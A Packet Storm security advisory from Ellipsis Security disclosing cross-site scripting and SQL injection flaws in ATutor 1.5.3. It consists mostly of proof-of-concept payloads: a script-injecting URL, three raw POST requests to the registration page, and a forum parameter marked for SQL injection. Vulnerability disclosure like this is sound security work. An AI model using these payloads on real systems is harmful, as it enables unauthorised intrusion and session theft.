atutor153-xss-sql.txt

2006-07-09T00:00:00
ID PACKETSTORM:48107
Type packetstorm
Reporter ellsec.org
Modified 2006-07-09T00:00:00

Description

                                        
                                            `ATutor 1.5.3  
http://www.atutor.ca  
--------------------------  
Cross Site Scripting (XSS)  
--------------------------  
http://target.xx/documentation/index_list.php?lang="><script>alert(/EllipsisSecurityTest/)</script>  
---  
POST http://target.xx:80/registration.php?register=Register HTTP/1.0  
Accept: */*  
Content-Type: application/x-www-form-urlencoded  
Host: target.xx  
ml=1&year="><script>alert(/EllipsisSecurityTest/)</script>  
---  
POST http://target.xx:80/registration.php?register=Register HTTP/1.0  
Accept: */*  
Content-Type: application/x-www-form-urlencoded  
Host: target.xx  
ml=1&month="><script>alert(/EllipsisSecurityTest/)</script>  
---  
POST http://target.xx:80/registration.php?register=Register HTTP/1.0  
Accept: */*  
Content-Type: application/x-www-form-urlencoded  
Host: target.xx  
ml=1&day="><script>alert(/EllipsisSecurityTest/)</script>  
-------------  
SQL injection  
-------------  
http://target.xx/forum/index.php?fid=-1[SQL]  
-----------------  
Ellipsis Security  
http://www.ellsec.org  
`